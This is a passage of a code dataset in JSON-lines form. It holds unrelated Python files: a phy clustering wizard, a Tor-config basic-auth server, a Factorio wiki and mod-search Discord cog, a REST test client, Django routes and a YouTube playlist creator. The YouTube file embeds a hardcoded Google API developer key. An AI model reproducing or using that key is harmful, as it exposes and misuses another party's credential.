items:\n        return current\n    if current not in items:\n        raise RuntimeError(\"{0} is not in {1}.\".format(current, items))\n    i = items.index(current)\n    if i 
== len(items) - 1:\n return current\n try:\n return _find_first(items[i + 1:], filter)\n except StopIteration:\n return current\n\n\ndef _progress(value, maximum):\n if maximum <= 1:\n return 1\n return int(100 * value / float(maximum - 1))\n\n\n#------------------------------------------------------------------------------\n# Wizard\n#------------------------------------------------------------------------------\n\nclass Wizard(object):\n \"\"\"Propose a selection of high-quality clusters and merge candidates.\"\"\"\n def __init__(self, cluster_groups=None):\n self.cluster_groups = cluster_groups\n self.reset()\n\n def reset(self):\n self._best_list = [] # This list is fixed (modulo clustering actions).\n self._match_list = [] # This list may often change.\n self._similarity = None\n self._quality = None\n self._best = None\n self._match = None\n\n @property\n def has_started(self):\n return len(self._best_list) > 0\n\n # Quality functions\n #--------------------------------------------------------------------------\n\n def set_similarity_function(self, func):\n \"\"\"Register a function returning the similarity between two clusters.\n\n Can be used as a decorator.\n\n \"\"\"\n self._similarity = func\n return func\n\n def set_quality_function(self, func):\n \"\"\"Register a function returning the quality of a cluster.\n\n Can be used as a decorator.\n\n \"\"\"\n self._quality = func\n return func\n\n # Internal methods\n #--------------------------------------------------------------------------\n\n def _group(self, cluster):\n return self._cluster_groups.get(cluster, None)\n\n def _in_groups(self, items, groups):\n \"\"\"Filter out ignored clusters or pairs of clusters.\"\"\"\n if not isinstance(groups, (list, tuple)):\n groups = [groups]\n return [item for item in items if self._group(item) in groups]\n\n def _is_not_ignored(self, cluster):\n return self._in_groups([cluster], (None, 'good'))\n\n def _check(self):\n clusters = set(self.cluster_ids)\n assert set(self._best_list) <= clusters\n assert set(self._match_list) <= clusters\n if self._best is not None and len(self._best_list) >= 1:\n assert self._best in self._best_list\n if self._match is not None and len(self._match_list) >= 1:\n assert self._match in self._match_list\n if None not in (self.best, self.match):\n assert self.best != self.match\n\n def _sort(self, items, mix_good_unsorted=False):\n \"\"\"Sort clusters according to their groups:\n unsorted, good, and ignored.\"\"\"\n if mix_good_unsorted:\n return (self._in_groups(items, (None, 'good')) +\n self._in_groups(items, 'ignored'))\n else:\n return (self._in_groups(items, None) +\n self._in_groups(items, 'good') +\n self._in_groups(items, 'ignored'))\n\n # Properties\n #--------------------------------------------------------------------------\n\n @property\n def cluster_ids(self):\n \"\"\"Array of cluster ids in the current clustering.\"\"\"\n return sorted(self._cluster_groups)\n\n @property\n def cluster_groups(self):\n \"\"\"Dictionary with the groups of each cluster.\n\n The groups are: `None` (corresponds to unsorted), `good`, or `ignored`.\n\n \"\"\"\n return self._cluster_groups\n\n @cluster_groups.setter\n def cluster_groups(self, cluster_groups):\n # cluster_groups is a dictionary or is converted to one.\n if _is_array_like(cluster_groups):\n # A group can be None (unsorted), `good`, or `ignored`.\n cluster_groups = {clu: None for clu in cluster_groups}\n self._cluster_groups = cluster_groups\n\n # Core methods\n 
#--------------------------------------------------------------------------\n\n def best_clusters(self, n_max=None, quality=None):\n \"\"\"Return the list of best clusters sorted by decreasing quality.\n\n The default quality function is the registered one.\n\n \"\"\"\n if quality is None:\n quality = self._quality\n best = _best_clusters(self.cluster_ids, quality, n_max=n_max)\n return self._sort(best)\n\n def most_similar_clusters(self, cluster=None, n_max=None, similarity=None):\n \"\"\"Return the `n_max` most similar clusters to a given cluster.\n\n The default similarity function is the registered one.\n\n \"\"\"\n if cluster is None:\n cluster = self.best\n if cluster is None:\n cluster = self.best_clusters(1)[0]\n if similarity is None:\n similarity = self._similarity\n s = [(other, similarity(cluster, other))\n for other in self.cluster_ids\n if other != cluster]\n clusters = _argsort(s, n_max=n_max)\n return self._sort(clusters, mix_good_unsorted=True)\n\n # List methods\n #--------------------------------------------------------------------------\n\n def _set_best_list(self, cluster=None, clusters=None):\n if cluster is None:\n cluster = self.best\n if clusters is None:\n clusters = self.best_clusters()\n self._best_list = clusters\n if clusters:\n self.best = clusters[0]\n\n def _set_match_list(self, cluster=None, clusters=None):\n if cluster is None:\n cluster = self.best\n if clusters is None:\n clusters = self.most_similar_clusters(cluster)\n self._match_list = clusters\n if clusters:\n self.match = clusters[0]\n\n @property\n def best(self):\n \"\"\"Currently-selected best cluster.\"\"\"\n return self._best\n\n @best.setter\n def best(self, value):\n assert value in self._best_list\n self._best = value\n\n @property\n def match(self):\n \"\"\"Currently-selected closest match.\"\"\"\n return self._match\n\n @property\n def selection(self):\n \"\"\"Return the current best/match cluster selection.\"\"\"\n b, m = self.best, self.match\n if b is None:\n return []\n elif m is None:\n return [b]\n else:\n if b == m:\n return [b]\n else:\n return [b, m]\n\n @match.setter\n def match(self, value):\n if value is not None:\n assert value in self._match_list\n self._match = value\n\n @property\n def best_list(self):\n \"\"\"Current list of best clusters, by decreasing quality.\"\"\"\n return self._best_list\n\n @property\n def match_list(self):\n \"\"\"Current list of closest matches, by decreasing similarity.\"\"\"\n return self._match_list\n\n @property\n def n_processed(self):\n \"\"\"Numbered of processed clusters so far.\n\n A cluster is considered processed if its group is not `None`.\n\n \"\"\"\n return len(self._in_groups(self._best_list, ('good', 'ignored')))\n\n @property\n def n_clusters(self):\n \"\"\"Total number of clusters.\"\"\"\n return len(self.cluster_ids)\n\n # Navigation\n #--------------------------------------------------------------------------\n\n @property\n def _has_finished(self):\n return self.best is not None and len(self._best_list) <= 1\n\n def next_best(self):\n \"\"\"Select the next best cluster.\"\"\"\n if self._has_finished:\n return\n self.best = _next(self._best_list,\n self._best,\n )\n if self.match is not None:\n self._set_match_list()\n\n def previous_best(self):\n \"\"\"Select the previous best in cluster.\"\"\"\n if self._has_finished:\n return\n self.best = _previous(self._best_list,\n self._best,\n )\n if self.match is not None:\n self._set_match_list()\n\n def next_match(self):\n \"\"\"Select the next match.\"\"\"\n # Handle the case where 
we arrive at the end of the match list.\n if self.match is not None and len(self._match_list) <= 1:\n self.next_best()\n else:\n self.match = _next(self._match_list,\n self._match,\n )\n\n def previous_match(self):\n \"\"\"Select the previous match.\"\"\"\n self.match = _previous(self._match_list,\n self._match,\n )\n\n def next(self):\n \"\"\"Next cluster proposition.\"\"\"\n if self.match is None:\n return self.next_best()\n else:\n return self.next_match()\n\n def previous(self):\n \"\"\"Previous cluster proposition.\"\"\"\n if self.match is None:\n return self.previous_best()\n else:\n return self.previous_match()\n\n def first(self):\n \"\"\"First match or first best.\"\"\"\n if self.match is None:\n self.best = self._best_list[0]\n else:\n self.match = self._match_list[0]\n\n def last(self):\n \"\"\"Last match or last best.\"\"\"\n if self.match is None:\n self.best = self._best_list[-1]\n else:\n self.match = self._match_list[-1]\n\n # Control\n #--------------------------------------------------------------------------\n\n def start(self):\n \"\"\"Start the wizard by setting the list of best clusters.\"\"\"\n self._set_best_list()\n\n def pin(self, cluster=None):\n \"\"\"Pin the current best cluster and set the list of closest matches.\"\"\"\n if self._has_finished:\n return\n if cluster is None:\n cluster = self.best\n if self.match is not None and self.best == cluster:\n return\n self.best = cluster\n self._set_match_list(cluster)\n self._check()\n\n def unpin(self):\n \"\"\"Unpin the current cluster.\"\"\"\n if self.match is not None:\n self.match = None\n self._match_list = []\n\n # Actions\n #--------------------------------------------------------------------------\n\n def _delete(self, clusters):\n for clu in clusters:\n if clu in self._cluster_groups:\n del self._cluster_groups[clu]\n if clu in self._best_list:\n self._best_list.remove(clu)\n if clu in self._match_list:\n self._match_list.remove(clu)\n if clu == self._best:\n self._best = self._best_list[0] if self._best_list else None\n if clu == self._match:\n self._match = None\n\n def _add(self, clusters, group, position=None):\n for clu in clusters:\n assert clu not in self._cluster_groups\n assert clu not in self._best_list\n assert clu not in self._match_list\n self._cluster_groups[clu] = group\n if self.best is not None:\n if position is not None:\n self._best_list.insert(position, clu)\n else:\n self._best_list.append(clu)\n if self.match is not None:\n self._match_list.append(clu)\n\n def _update_state(self, up):\n # Update the cluster group.\n if up.description == 'metadata_group':\n cluster = up.metadata_changed[0]\n group = up.metadata_value\n self._cluster_groups[cluster] = group\n # Reorder the best list, so that the clusters moved in different\n # groups go to their right place in the best list.\n if self._best is not None and self._best_list:\n # Find the next best after the cluster has been moved.\n next_best = _next(self._best_list, self._best)\n # Reorder the list.\n self._best_list = self._sort(self._best_list)\n # Select the next best.\n self._best = next_best\n # Update the wizard with new and old clusters.\n for clu in up.added:\n # Add the child at the parent's position.\n parents = [x for (x, y) in up.descendants if y == clu]\n parent = parents[0]\n group = self._group(parent)\n position = (self._best_list.index(parent)\n if self._best_list else None)\n self._add([clu], group, position)\n # Delete old clusters.\n self._delete(up.deleted)\n # Select the last added cluster.\n if self.best is not None 
and up.added:\n self.best = up.added[-1]\n\n def on_cluster(self, up):\n if self._has_finished:\n return\n if self._best_list or self._match_list:\n self._update_state(up)\n\n # Panel\n #--------------------------------------------------------------------------\n\n @property\n def _best_progress(self):\n \"\"\"Progress in the best clusters.\"\"\"\n value = (self.best_list.index(self.best)\n if self.best in self.best_list else 0)\n maximum = len(self.best_list)\n return _progress(value, maximum)\n\n @property\n def _match_progress(self):\n \"\"\"Progress in the processed clusters.\"\"\"\n value = self.n_processed\n maximum = self.n_clusters\n return _progress(value, maximum)\n\n def get_panel_params(self):\n \"\"\"Return the parameters for the HTML panel.\"\"\"\n return dict(best=self.best if self.best is not None else '',\n match=self.match if self.match is not None else '',\n best_progress=self._best_progress,\n match_progress=self._match_progress,\n best_group=self._group(self.best) or 'unsorted',\n match_group=self._group(self.match) or 'unsorted',\n )\n\n\n#------------------------------------------------------------------------------\n# Wizard view model\n#------------------------------------------------------------------------------\n\nclass WizardViewModel(HTMLClusterViewModel):\n def get_html(self, **kwargs):\n static_path = op.join(op.dirname(op.realpath(__file__)), 'static')\n params = self._wizard.get_panel_params()\n html = _read('wizard.html', static_path=static_path)\n return html.format(**params)\n\n def get_css(self, **kwargs):\n css = super(WizardViewModel, self).get_css(**kwargs)\n static_path = op.join(op.dirname(op.realpath(__file__)), 'static')\n css += _read('styles.css', static_path=static_path)\n return css\n","sub_path":"phy/cluster/manual/wizard.py","file_name":"wizard.py","file_ext":"py","file_size_in_byte":16481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"379361972","text":"\nclass Result:\n def __init__(self, coin, type, time_frame, score, beg, end):\n self.coin = coin\n self.type = type\n self.time_frame = time_frame\n self.score = score\n self.beg = beg #candles away from present\n self.end = end #cadles away from present\n\n def __str__(self):\n return \"Pairing: {} | Time Frame: {} | Type Divergence: {} | Score: {} | When: {} to {} periods ago\".format(self.coin, self.time_frame, self.type, self.score, self.beg, self.end)\n","sub_path":"Result.py","file_name":"Result.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"72159325","text":"from common.http_interface import *\n\nheaders = None\nclass Services:\n\n def get_connected(self):\n try:\n url = \"https://reqres.in/api/users?page=1\"\n response = get_resource(url, headers)\n # print(response)\n return response\n except Exception as e:\n print(\"unable to get connected through url {}\".format(e))\n\n def get_all_following(self):\n try:\n url = \"https://reqres.in/api/users?page=2\"\n response = get_resource(url, headers)\n return response\n Logger.log_info(\"getting all the list of employees\")\n except Exception as e:\n Logger.log_error(\"unable to get the employees {}\".format(str(e)))\n\n def create_data(self,value):\n try:\n value = value\n data = json.dumps(value).encode('utf-8')\n url = 'https://reqres.in/api/users'\n response = create_resource(url=url, headers=headers, data=data)\n Logger.log_info(response.status_code)\n # data = 
json.dumps(value).encode('utf-8')\n            if response.status_code == 201:\n                resp = json.dumps(response.json())\n                Logger.log_info(\"posting, updating some information successfully\")\n\n                return resp\n        except Exception as e:\n            Logger.log_error(\"unable to get the response {}\".format(str(e)))\n\ns = Services()\nprint(s.get_all_following())\nprint(s.get_connected())\nprint(s.create_data(value={\"name\": \"gopi\", \"job\": \"Automation tester\"}))","sub_path":"RestAPIFramework/source/uber/uber_service.py","file_name":"uber_service.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"229408305","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nimport re\n\n\n# This is the json config data that gets sent to authorized users\nTOR_CONFIG_JSON_STRING = None\nTOR_CONFIG_JSON_FILENAME = 'torconfig.json'\n\n\nAUTH_FILENAME = 'auth_credentials.dat'\n# Auth credentials are base64 encoded strings that get loaded from the\n# auth_credentials.dat file.\n# The strings are user:password encoded in base64\nAUTH_CREDENTIALS = []\n\n# Regex used to check if a string is indeed base64\nBASE64_REGEX_VALIDATOR = r'^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)$'\nBASE64_REGEX_VALIDATOR = re.compile(BASE64_REGEX_VALIDATOR)\n\n\nclass TorAuthServer(BaseHTTPRequestHandler):\n    def send_auth_request(self):\n        print('Unauthorized user request, sending WWW-Authenticate headers')\n        self.send_response(401)\n        self.send_header('WWW-Authenticate', 'Basic realm=\\\"Tor auth\\\"')\n        self.send_header('Content-type', 'text/html')\n        self.end_headers()\n\n    def send_tor_config_data(self):\n        self.send_header(\"Content-type\", \"application/json\")\n        self.end_headers()\n        self.wfile.write(TOR_CONFIG_JSON_STRING.encode())\n\n    def do_GET(self):\n        auth_header = self.headers.get('Authorization')\n        if auth_header is None:\n            # User is not logged in and must post with basic auth headers\n            self.send_auth_request()\n            
self.wfile.write(b'Please enter your username and password')\n elif auth_header.startswith('Basic '):\n auth_token = auth_header.split(' ')[1]\n print(auth_token)\n if auth_token in AUTH_CREDENTIALS:\n print('Authenticated user connected, sending TOR config')\n self.send_response(200)\n self.send_tor_config_data()\n else:\n self.send_auth_request()\n self.wfile.write(b'Invalid auth credentials, try again')\n else:\n self.send_auth_request()\n self.wfile.write(b'Invalid auth credentials, try again')\n\n\ndef is_valid_base64(content):\n return BASE64_REGEX_VALIDATOR.match(content) is not None\n\n\ndef read_auth_file():\n with open(AUTH_FILENAME, 'r') as f:\n for line in f.readlines():\n if line:\n line = line.strip()\n if is_valid_base64(line):\n AUTH_CREDENTIALS.append(line)\n else:\n print(f'auth credential {line} ignored, must be valid base64')\n\n\ndef read_tor_config_json_file():\n global TOR_CONFIG_JSON_STRING\n with open(TOR_CONFIG_JSON_FILENAME, 'r') as f:\n TOR_CONFIG_JSON_STRING = f.read()\n\n\ndef run():\n print('Starting TOR Auth server')\n\n read_auth_file()\n read_tor_config_json_file()\n\n server_address = ('127.0.0.1', 8080)\n httpd = HTTPServer(server_address, TorAuthServer)\n\n message = 'Server is running on {}:{}' \\\n .format(server_address[0], server_address[1])\n\n print(message)\n\n httpd.serve_forever()\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"tor_auth_server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"613831139","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('team/', views.team, name='team'),\n path('match/', views.match, name='match'),\n path('player/', views.player, name='player'),\n path('recharge', views.recharge, name='recharge'),\n path('account', views.account, name='account'),\n path('login', views.login_view, name='login'),\n path('logout', views.logout_view, name='logout'),\n path('register', views.register, name='register'),\n path('about', views.about, name='about'),\n path('terms', views.terms, name='terms'),\n path('privacy', views.privacy, name='privacy'),\n path('live', views.live, name='live'),\n path('history', views.history, name='history'),\n path('pool', views.pool, name='pool'),\n path('dev', views.dev, name='dev')\n]\n","sub_path":"thon/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"76806337","text":"# ======================================================================\n# imports\n# ======================================================================\nimport aiohttp\nimport bs4\nimport tomd\nimport re\n\nimport discord\nfrom discord.ext import commands as cmds\n\n\n# ======================================================================\ndef mod_embed(result):\n taglist = []\n fields = []\n title = result.find(\"div\", class_=\"mod-card-info-container\").find(\"h2\", class_=\"mod-card-title\").find(\"a\")\n em = discord.Embed(title=title.get_text(),\n url=f\"https://mods.factorio.com{title['href'].replace(' ', '%20')}\",\n description=result.find(\"div\", class_=\"mod-card-info-container\")\n .find(\"div\", class_=\"mod-card-summary\").get_text(),\n colour=0x19B300)\n thumbnail = result.find(\"div\", class_=\"mod-card-thumbnail\")\n if \"no-picture\" not in thumbnail.attrs[\"class\"]:\n 
em.set_thumbnail(url=thumbnail.find(\"a\").find(\"img\")[\"src\"])\n owner = result.find(\"div\", class_=\"mod-card-info-container\").find(\"div\", class_=\"mod-card-author\").find(\"a\")\n fields.append({\"name\": \"Owner\", \"value\": f\"[{owner.get_text()}]({owner['href']})\"})\n for tag in result.find(\"div\", class_=\"mod-card-footer\").find(\"ul\").find_all(\"li\", class_=\"tag\"):\n tag = tag.find(\"span\").find(\"a\")\n taglist.append(f\"[{tag.get_text()}]({tag['href']})\")\n game_versions = result.find(\"div\", class_=\"mod-card-info\") \\\n .find(\"span\", title=\"Available for these Factorio versions\")\n downloads = result.find(\"div\", class_=\"mod-card-info\").find(\"span\", title=\"Downloads\")\n created_at = result.find(\"div\", class_=\"mod-card-info\").find(\"span\", title=\"Last updated\")\n fields.extend([{\"name\": \"Tags\", \"value\": ', '.join(taglist)},\n {\"name\": \"Game Version(s)\", \"value\":\n game_versions.find(\"div\", class_=\"mod-card-info-tag-label\").get_text()},\n {\"name\": \"Downloads\", \"value\": downloads.find(\"div\", class_=\"mod-card-info-tag-label\").get_text()},\n {\"name\": \"Updated\", \"value\": created_at.find(\"div\", class_=\"mod-card-info-tag-label\").get_text()}])\n for field in fields:\n em.add_field(**field, inline=True)\n # em.set_footer(text=bot.user.name,\n # icon_url=f\"https://cdn.discordapp.com/avatars/{bot.user.id}/{bot.user.avatar}.png?size=64\")\n return em\n\n\nclass Factorio:\n def __init__(self, bot):\n self.bot = bot\n type(self).__name__ = \"Factorio Commands\"\n\n @cmds.command(name=\"linkmod\", aliases=[\"mod\"])\n async def link_mod(self, ctx, *, modname):\n \"\"\"\n Search for a mod in [mods.factorio.com](https://mods.factorio.com).\n \"\"\"\n em = discord.Embed(title=f\"Searching for \\\"{modname.title()}\\\" in mods.factorio.com...\",\n description=\"This may take a bit.\",\n colour=0xDFDE6E)\n # em.set_footer(text=self.bot.user.name,\n # icon_url=f\"https://cdn.discordapp.com/avatars/{self.bot.user.id}/\n # {self.bot.user.avatar}.png?size=64\")\n buffer_msg = await ctx.send(embed=em)\n async with ctx.channel.typing():\n try:\n async with aiohttp.ClientSession() as session:\n modname = modname.title()\n async with session.get(f\"https://mods.factorio.com/query/{modname}\") as response:\n soup = bs4.BeautifulSoup(await response.text(), 'html.parser')\n\n if \" 0 \" in soup.find('span', class_='active-filters-bar-total-mods').get_text():\n em = discord.Embed(title=\"Error\",\n description=f\"Could not find \\\"{modname.title()}\\\" in mod portal.\",\n colour=0xDC143C)\n await buffer_msg.edit(embed=em)\n return\n\n if soup.find_all('div', class_=\"mod-card\"):\n if len(soup.find_all('div', class_=\"mod-card\")) > 1:\n em = discord.Embed(title=f\"Search results for \\\"{modname}\\\"\",\n colour=0xDFDE6E)\n i = 0\n for result in soup.find_all('div', class_=\"mod-card\"):\n if i <= 4:\n title = result.find(\"h2\", class_=\"mod-card-title\").find(\"a\")\n if title.get_text().title() == modname.title():\n em = mod_embed(result)\n break\n em.add_field(name=title.get_text(),\n value=f\"{result.find('div', class_='mod-card-summary').get_text()}\"\n f\" [_Read More_](https://mods.factorio.com/mods{title['href']})\")\n i += 1\n\n else:\n em = mod_embed(soup.find(\"div\", class_=\"mod-card\"))\n\n await buffer_msg.edit(embed=em)\n return\n\n except (aiohttp.client_exceptions.ContentTypeError, KeyError):\n em = discord.Embed(title=\"Error\",\n description=\"Couldn't reach mods.factorio.com.\",\n colour=0xDC143C)\n 
await buffer_msg.edit(embed=em)\n\n    @cmds.command(name=\"wiki\")\n    async def wiki(self, ctx, *, searchterm):\n        \"\"\"\n        Searches for a term in the [official Factorio wiki](https://wiki.factorio.com/).\n        \"\"\"\n        em = discord.Embed(title=f\"Searching for \\\"{searchterm.title()}\\\" in wiki.factorio.com...\",\n                           description=\"This shouldn't take long.\",\n                           colour=0xDFDE6E)\n        # em.set_footer(text=self.bot.user.name,\n        #               icon_url=f\"https://cdn.discordapp.com/avatars/{self.bot.user.id}/\n        # {self.bot.user.avatar}.png?size=64\")\n        buffer_msg = await ctx.send(embed=em)\n        async with ctx.channel.typing():\n            async with aiohttp.ClientSession() as client:\n                async with client.get(\n                        f\"https://wiki.factorio.com/index.php?search={searchterm.replace(' ', '%20')}\") as resp:\n                    r = await resp.text()\n                    url = str(resp.url)\n            soup = bs4.BeautifulSoup(r, 'html.parser')\n            if soup.find('p', class_='mw-search-nonefound'):\n                em = discord.Embed(title=\"Error\",\n                                   description=f\"Could not find \\\"{searchterm.title()}\\\" in wiki.\",\n                                   colour=0xDC143C)\n                # em.set_footer(text=self.bot.user.name,\n                #               icon_url=f\"https://cdn.discordapp.com/avatars/{self.bot.user.id}/\n                # {self.bot.user.avatar}.png?size=64\")\n                await buffer_msg.edit(embed=em)\n                return\n            if soup.find_all('ul', class_=\"mw-search-results\"):\n                em = discord.Embed(title=\"Factorio Wiki\",\n                                   url=url,\n                                   colour=0xDFDE6E)\n                for item in soup.find_all('ul', class_=\"mw-search-results\")[0].find_all(\"li\"):\n                    item = item.find_next('div', class_=\"mw-search-result-heading\").find('a')\n                    itemlink = item['href'] if not item['href'].endswith(\")\") else item['href'].replace(\")\", \"\\)\")\n                    em.add_field(name=item['title'],\n                                 value=f\"[Read More](https://wiki.factorio.com{itemlink})\",\n                                 inline=True)\n                # em.set_footer(text=self.bot.user.name,\n                #               icon_url=f\"https://cdn.discordapp.com/avatars/{self.bot.user.id}/\n                # {self.bot.user.avatar}.png?size=64\")\n                await buffer_msg.edit(embed=em)\n            else:\n                description_ = \"\"\n                if soup.select(\"#mw-content-text > p\"):\n                    p_num = 0\n                    if re.search(r\"((^<br/>$)|(This (article|page)))\", str(soup.select(\"#mw-content-text > p\")[0])):\n                            p_num = 1\n                        description_ = tomd.convert(str(soup.select(\"#mw-content-text > p\")[p_num])) \\\n                            .strip().replace(\"<br/>
\", \"\\n\")\n em = discord.Embed(title=soup.find(\"h1\", id='firstHeading').get_text(),\n description=re.sub(r\"\\((\\/\\S*)\\)\", r\"(https://wiki.factorio.com\\1)\", description_),\n url=url,\n colour=0x19B300)\n if soup.find('div', class_=\"factorio-icon\"):\n em.set_thumbnail(\n url=f\"https://wiki.factorio.com{soup.find('div', class_='factorio-icon').find('img')['src']}\")\n # em.set_footer(text=self.bot.user.name,\n # icon_url=f\"https://cdn.discordapp.com/avatars/{self.bot.user.id}/\n # {self.bot.user.avatar}.png?size=64\")\n await buffer_msg.edit(embed=em)\n\n\n# ======================================================================\ndef setup(bot):\n bot.add_cog(Factorio(bot))\n","sub_path":"cogs/factorio.py","file_name":"factorio.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"228625385","text":"import argparse\nimport sys\nimport time\n\nimport httplib2\nfrom PyQt4 import QtCore\nfrom apiclient import discovery\nfrom oauth2client import tools\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.file import Storage\nfrom oauth2client.tools import argparser, run_flow\n\n\nclass ChangeMyBarEvent:\n def __init__(self, value):\n self.value = value\n\n\nclass ChangeMyListEvent:\n def __init__(self, nombre, artista, album):\n self.nombre = nombre\n self.artista = artista\n self.album = album\n\n\nclass CreadorDePlay(QtCore.QThread):\n trigger = QtCore.pyqtSignal(ChangeMyBarEvent)\n trigger2 = QtCore.pyqtSignal(ChangeMyListEvent)\n CLIENT_SECRETS_FILE = \"client_secrets.json\"\n YOUTUBE_SCOPE = \"https://www.googleapis.com/auth/youtube\"\n YOUTUBE_READ_WRITE_SSL_SCOPE = \"https://www.googleapis.com/auth/youtube.force-ssl\"\n\n def __init__(self, parent, play, developer_key=\"AIzaSyDsKS548hXYlTve-WETqBRIsPqc3OBHTdo\",\n YOUTUBE_API_SERVICE_NAME=\"youtube\", YOUTUBE_API_VERSION=\"v3\"):\n super().__init__()\n self.parent = parent\n self.play = play\n self.DEVELOPER_KEY = developer_key\n self.YOUTUBE_API_SERVICE_NAME = YOUTUBE_API_SERVICE_NAME\n self.YOUTUBE_API_VERSION = YOUTUBE_API_VERSION\n self.trigger.connect(parent.set_value_bar)\n self.trigger2.connect(parent.cambiar_lists)\n self.diccionario = {self.play: []}\n self.youtube = self.get_authenticated_service()\n\n def crear_playlist(self):\n nombre = self.play\n CLIENT_SECRETS_FILE = \"client_secrets.json\"\n\n MISSING_CLIENT_SECRETS_MESSAGE = \"\"\"\n WARNING: Please configure OAuth 2.0\"\"\"\n\n # This OAuth 2.0 access scope allows for full read/write access to the\n # authenticated user's account.\n YOUTUBE_READ_WRITE_SCOPE = \"https://www.googleapis.com/auth/youtube\"\n YOUTUBE_API_SERVICE_NAME = \"youtube\"\n YOUTUBE_API_VERSION = \"v3\"\n\n flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,\n message=MISSING_CLIENT_SECRETS_MESSAGE,\n scope=YOUTUBE_READ_WRITE_SCOPE)\n\n storage = Storage(\"%s-oauth2.json\" % sys.argv[0])\n credentials = storage.get()\n\n if credentials is None or credentials.invalid:\n flags = argparser.parse_args()\n credentials = run_flow(flow, storage, flags)\n\n youtube = discovery.build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,\n http=credentials.authorize(httplib2.Http()))\n\n playlists_insert_response = youtube.playlists().insert(\n part=\"snippet,status\",\n body=dict(\n snippet=dict(\n title=nombre,\n description=\"Lista {} copiada desde spotify :)\".format(nombre)\n ),\n status=dict(\n privacyStatus=\"private\"\n )\n )\n ).execute()\n 
self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"id\"] = playlists_insert_response[\"id\"]\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"canciones\"] = []\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"max_coments\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"min_coments\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"max_likes\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"min_likes\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"max_dislikes\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"min_dislikes\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"max_views\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"min_views\"] = {}\n\n def youtube_search(self, options):\n youtube = discovery.build(self.YOUTUBE_API_SERVICE_NAME, self.YOUTUBE_API_VERSION,\n developerKey=self.DEVELOPER_KEY)\n\n # Call the search.list method to retrieve results matching the specified\n # query term.\n search_response = youtube.search().list(\n q=options.q,\n part=\"id,snippet\",\n maxResults=options.max_results\n ).execute()\n\n videosid = None\n # Add each result to the appropriate list, and then display the lists of\n # matching videos, channels, and playlists.\n for search_result in search_response.get(\"items\", []):\n\n if search_result[\"id\"][\"kind\"] == \"youtube#video\":\n videosid = search_result[\"id\"][\"videoId\"]\n videosname = search_result[\"snippet\"][\"title\"]\n break\n\n return videosid, videosname\n\n def search(self, busqueda):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--q\", help=\"Search term\", default=busqueda)\n parser.add_argument(\"--max-results\", help=\"Max results\", default=5)\n args = parser.parse_args()\n id, video = self.youtube_search(args)\n return id, video\n\n def get_authenticated_service(self):\n flow = flow_from_clientsecrets(self.CLIENT_SECRETS_FILE, scope=self.YOUTUBE_SCOPE,\n message=\"Error, revisa tus credenciales\")\n\n storage = Storage(\"%s-oauth2.json\" % sys.argv[0])\n credentials = storage.get()\n\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage)\n\n return discovery.build(self.YOUTUBE_API_SERVICE_NAME, self.YOUTUBE_API_VERSION,\n http=credentials.authorize(httplib2.Http()))\n\n def add_video_to_playlist(self, youtube, videoID, playlistID):\n add_video_request = youtube.playlistItems().insert(\n part=\"snippet\",\n body={\n 'snippet': {\n 'playlistId': playlistID,\n 'resourceId': {\n 'kind': 'youtube#video',\n 'videoId': videoID\n }\n # 'position': 0\n }\n }\n ).execute()\n\n def get_video_statistics(self, video_id):\n youtube = self.youtube\n results = youtube.videos().list(\n id=video_id,\n part=\"statistics\"\n ).execute()\n\n return results[\"items\"][0][\"statistics\"]\n\n def run(self):\n valor = 1\n for cancion in self.parent.playlists[\"playlists\"][self.play][\"tracks\"]:\n time.sleep(0.2)\n id, titulo = self.search(cancion[\"name\"] + \" \" + \" \".join(cancion[\"artists\"]))\n diccionario = {\"nombre\": cancion[\"name\"],\n \"artistas\": \" \".join(cancion[\"artists\"]),\n \"id\": id,\n \"title\": titulo,\n \"link\": \"https://www.youtube.com/watch?v=\" + id,\n \"album\": cancion[\"album\"]}\n\n self.trigger.emit(ChangeMyBarEvent(valor))\n self.trigger2.emit(ChangeMyListEvent(cancion[\"name\"], \" \".join(cancion[\"artists\"]), 
